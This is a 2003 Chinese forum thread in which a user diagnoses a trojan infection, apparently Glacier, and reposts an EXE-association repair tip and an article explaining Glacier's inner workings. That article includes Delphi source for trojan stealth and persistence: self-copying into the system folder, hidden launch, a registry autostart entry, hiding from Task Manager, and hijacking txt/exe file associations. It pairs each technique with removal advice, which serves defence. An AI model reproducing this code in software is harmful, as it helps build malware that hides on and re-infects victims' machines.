快乐的瓶子 2003-3-7 17:05
HELP ME!
今天是不是有出了新病毒啊
我的机器运行半个小时就报告虚拟内存不够啊
以前没有这种情况的呀
我的物理内存256M
虚拟内存设置了512M
用任务管理器察看内存占用情况在750M左右啊
晕了
晕了
晕了
现在是17.03分 我的内存使用了530M了
大概在过一会又要重新启动了
我晕啊
谁救救我
快乐的瓶子 2003-3-7 17:10
有没有可能是木马
我今天运行了一个东东(具体什么记不的了 是个什么服务器端什么的) 好像没有反应的退出了
就是木马也不应该占用大量内存啊 我的CPU占用都不高 网络流量也不高啊
zack 2003-3-7 17:13
什么操作系统?
按ctrl+alt+del 三个键,看看有什么进程。试着从下往上关闭一些进程。
xiaoxiao 2003-3-7 17:19
。。
安全模式或启动盘启动/
杀毒//// 有些像蠕虫/
快乐的瓶子 2003-3-7 22:15
用最新的瑞星病毒库查了 没有问题
不过还没有进入DOS查
我用的是2000专业版 调用任务管理器察看后 感觉kernelbc.exe比较异常
KILL该进程后 哈哈哈哈
内存占用回落到正常的水平
不过还是不知道kernelbc.exe是干什么的
有朋友给我查查么 是木马还是正常文件感染了病毒啊
如果是正常文件那么是起什么作用的
最好拜托发一个好的kernelbc.exe给我哦
快乐的瓶子 2003-3-8 20:17
你好毒 你好毒 你好 毒呜呜呜呜呜
可以确定是木马了(有可能是冰河) 现在我把kernelbc.exe删除了
但是还是有一个新问题 就是我的2000的EXE关联被改了
所有的EXE文件无法运行了 拨号都不行了 我只有把所有的EXE后缀改为COM来运行
惨哦 现在我正在找有关资料 希望能恢复EXE的关联
快乐的瓶子 2003-3-8 21:05
用“金山毒霸”巧修文件关联
先问大家一个问题:你们用《金山毒霸》来做什么呢?我想也许很多的读者朋友说我在多此一问,当然是用来查杀病毒啦!没错,《金山毒霸》的确是用来查杀病毒的,但是它还有其他用处吗?今天我想来说说它的一个小功能。
我想大家平常使用《金山毒霸》,大概都是以下这些用途:1、调用主程序查杀病毒;2、开着防火墙防范病毒;3、用邮件监控检测E-mail是否有病毒;4、使用《金山网镖》保
护你的电脑免受攻击;5、使用嵌入式功能保护你的IE、Office等等,总之都是和查杀病毒、防范攻击有关的。但是其实还有一个小功能,如果有一天你遇到了某些特殊情况的时候,你就会觉得它很实用了。说了半天,这个功能究竟是什么呢?就是:自动恢复注册表的EXE关联。那么这个功能究竟有什么用处?怎么个用法?何时使用呢?请大家听我慢慢道来。
我们知道在Windows中打开文件都是有一定的文件关联的,比如我把RM格式的文件关联到了《金山影霸》,那么我们双击RM格式的文件的时候Windows就会自动调用《金山影霸》打开该文件;再比如我们双击一个TXT后缀的文件,这时候Windows一般就会调用系统的记事本打开该文件。那么同样道理EXE文件的打开也是有一定关联的,这个EXE文件关联在注册表中就是以下的位置:[HKEY_CLASSES_ROOT\exefile\shell\open\command],默认的键值为:"%1 %*"
这是正常的EXE关联,默认键值如果有误,那么就有问题了。比如说某些特洛伊木马程序就会修改这个关联,使Windows的EXE关联指向木马文件,这样你每次运行EXE文件的同时就会激活该木马。对付木马,常用的方法是直接删除木马,但是由此可能会出现以下的问题:找不到文件。请确定路径和文件名是否正确,而且所需的库文件均可用。
就是说你所有的EXE文件都不能运行了,这可如何是好?这时候就是这个小功能出场的时候了。只要你安装了《金山毒霸》,进入安装目录,找到KAV9X.EXE这个文件,把它改为KAV9X.COM,就是改一下后缀,然后双击运行这个文件,这时候《金山毒霸》主程序被启动了,关闭《金山毒霸》,把KAV9X.COM改回KAV9X.EXE,这样你就大功告成了。
你再试试运行EXE文件看看,如何呢?全部都可以运行了。这是因为《金山毒霸》每一次启动都会检查Windows注册表的EXE关联是否正确,如果不是系统默认值就会改回来的,我上边的修复方法就是利用了这一点。由于丢失EXE关联,所有EXE文件都不可以打开,《金山毒霸》也不例外,但是只要我们把《金山毒霸》主程序成功打开的话,它就会自动恢复EXE关联的。其实如果你设置了《金山毒霸》防火墙开机时候自动运行的话,那么就更简单了,当你发现出现上述对话框告诉你EXE文件运行不了的时候,只要重启一下电脑,《金山毒霸》防火墙在开机自动加载的时候就会自动恢复注册表的EXE关联的。
快乐的瓶子 2003-3-8 21:08
冰河”启示录
作者: 陈经韬
前言:我经常在杂志和报刊上看到此类标题的文章,但大多是骗稿费的,没有任何技术含量.于是一气之下写了这编东西.本人声明如下:(一)本人对"冰河"及其作者没有任何不满,相反,作者肯帮助初学者的态度是我们每一个人都应该学习的.(二)本文的目的在于交流编程经验,没有任何其它不良企图.(三)在一些领域,我们理应宁可自制力让我们的预见力保持寂寞,也不要去做一个打开潘多拉盒子的先知。所以一些更厉害的方法我们现在不会提,以后也不会
(1)
“冰河”是有名的用C++Builder编写的国产远程管理软件,其自我的功能保护很强,下面就以Delphi为例谈一谈它的原理,希望对大家有一些启发.
一、程序安装
此类程序一般会把自己隐藏起来运行,通常不外乎以下几种方法:自我拷贝法、资源文件法、网页方式安装、类病毒捆绑法(如YAI).自我拷贝法适用于本身就一个文件,资源文件法可以同时安装好几个文件,网页方式安装要先向M$交钱换安全签证,类病毒捆绑法利用了病毒的原理.本文只介绍自我拷贝法,其它方法请到我的个人主页去看.[url]http://lovejingtao.126.com[/url]
1:自我拷贝法
这种方法的原理是程序运行时先查看自己是不是在特定目录下,如果是就继续运行,如果不是就把自己拷贝到特定目录下,然后运行新程序,再退出旧程序.
打开Delphi,新建一个工程,在窗口的Create事件中写代码:
procedure TFORM1.FORMCreate(Sender: TObject);
var myname: string;
begin
myname := ExtractFilename(Application.Exename); //获得文件名
if application.Exename < > GetWindir + myname then //如果文件不是在Windows\System\那么..
begin
copyfile(pchar(application.Exename), pchar(GetWindir + myname), False);{将自己拷贝到Windows\System\下}
Winexec(pchar(GetWindir + myname), sw_hide);//运行Windows\System\下的新文件
application.Terminate;//退出
end;
end;
其中GetWinDir是自定义函数,起功能是找出Windows\System\的路径.
function GetWinDir: String;
var
Buf: array[0..MAX_PATH] of char;
begin
GetSystemDirectory(Buf, MAX_PATH);
Result := Buf;
if Result[Length(Result)]< > '\' then Result := Result + '\';
end;
另外,为了避免同时运行多个程序的副本(节约系统资源也),程序一般会弄成每次只能运行一个.这又有几种方法.
一种方法是程序运行时先查找有没有相同的运行了,如果有,就立刻退出程序.
修改dpr项目文件,修改begin和end之间的代码如下:
begin
Application.Initialize;
if FindWindow('TFORM1','FORM1')=0 then begin
//当没有找到FORM1时执行下面代码
Application.ShowMainFORM:=False; //不显示主窗口
Application.CreateFORM(TFORM1, FORM1);
Application.Run;
end;
end.
另一种方法是启动时会先通过窗口名来确定是否已经在运行,如果是则关闭原先的再启动。“冰河”就是用这种方法的。
这样做的好处在于方便升级.它会自动用新版本覆盖旧版本.
方法如下:修改dpr项目文件
uses
FORMs,windows,messages,
Unit1 in 'Unit1.pas' {FORM1};
为了程序能在Windows每次启动时自动运行,可以通过六种途径来实现.“冰河”用注册表的方式。
加入Registry单元,改写上面的窗口Create事件,改写后的程序如下:
procedure TFORM1.FORMCreate(Sender: TObject);
const K = '\Software\Microsoft\Windows\CurrentVersion\RunServices';
var myname: string;
begin
{Write by Lovejingtao,[url]http://Lovejingtao.126.com,Lovejingtao@21cn.com[/url]}
myname := ExtractFilename(Application.Exename); //获得文件名
if application.Exename < > GetWindir + myname then //如果文件不是在Windows\System\那么..
begin
copyfile(pchar(application.Exename), pchar(GetWindir + myname), False);{//将自己拷贝到Windows\System\下}
Winexec(pchar(GetWindir + myname), sw_hide);//运行Windows\System\下的新文件
application.Terminate;//退出
end;
with TRegistry.Create do
try
RootKey := HKEY_LOCAL_MACHINE;
OpenKey( K, TRUE );
WriteString( 'syspler', application.ExeName );
finally
free;
end;
end;
为了让程序用ALT+DEL+CTRL看不见,在implementation后添加声明:
function RegisterServiceProcess(dwProcessID, dwType: Integer): Integer; stdcall; external 'KERNEL32.DLL';
再在上面的窗口Create事件加上一句:RegisterServiceProcess(GetCurrentProcessID, 1);//隐藏
启示1:当我们中了“冰河”,如果被对方上了密码而无法自己卸载时,可以先找出是什么文件,然后自己配置一个没有密码的来运行,这样它就会把原来有密码的覆盖掉,自己就可以轻松用它的卸载功能把它卸掉.如果你会编程,也可以自己写一个"清除器"了,方法是先查找到窗口名,向它发送退出命令,再把它删除即可.
(2)
“冰河”的自我功能保护很强,它一般通过Txt或Exe文件关联来达到自我恢复.所以有很多人明明把它杀掉了,但重新启动时又会出现.下面举以Txt文件关联为例.
打开Delphi,新建一个工程,在窗口的Create事件中写代码:
uses Registry
procedure TFORM1.FORMCreate(Sender: TObject);
const Kkk = '\Software\Microsoft\Windows\CurrentVersion\RunServices';
const K = '\txtfile\shell\open\command';
var sFileName:string;
begin
//******************************************************
with TRegistry.Create do //写注册表,让程序跟文本文件关联
try
RootKey := HKEY_CLASSES_ROOT;
OpenKey( K, TRUE );
{Write by Lovejingtao,[url]http://lovejingtao.126.com[/url]}
WriteString( '', application.ExeName+' "%1" ');
{Write by Lovejingtao,lovejingtao@21cn.com}
finally
free;
end;
//*******************************************************
with TRegistry.Create do //写注册表,每次启动时自动运行
try
RootKey := HKEY_LOCAL_MACHINE;
OpenKey( Kkk, TRUE );
WriteString( 'myTray', application.ExeName );
finally
free;
end;
//********************************************************
if FileExists(pchar(Getwindir+'Sysplay.exe'))=false then//如果文件已经删除
begin
copyfile;//自定义拷贝资源文件过程
winexec(pchar(Getwindir+'Sysplay.exe'),sw_hide);
end;
//**********************************************************
if ParamCount> 0 then begin (* 有执行参数传入 *)
sFileName:=ParamStr(1); (* 取得参数内容 *)
winexec(pchar('Notepad.exe '+sFileName),sw_show);(*用记事本打开*)
//winexec(pchar( sFileName),sw_show);
end;
//*******************************************************
application.Terminate;//退出
end;
如果要改为与Exe文件关联,只要把"const K = '\txtfile\shell\open\command';"改为
"const K = '\exefile\shell\open\command';",把"winexec(pchar('Notepad.exe '+sFileName),sw_show);"
改为"winexec(pchar( sFileName),sw_show);"即可.当然,还要加入是否退出Windows而运行的Rundll32.dll,
否则会因为关联Exe文件而退不出Windows.
启示2:手工删除“冰河”时,还要改掉它的保护功能,不能让它恢复.如果是关联了文本文件,先改注册表让它不能自动运行,重启后不要打开文本文件,立刻进到其安装目录把它删除.如果是关联了Exe文件,那只有回到Dos下删.切记:一定要把两个文件同时删掉,否则你重启后会发现文件又恢复了.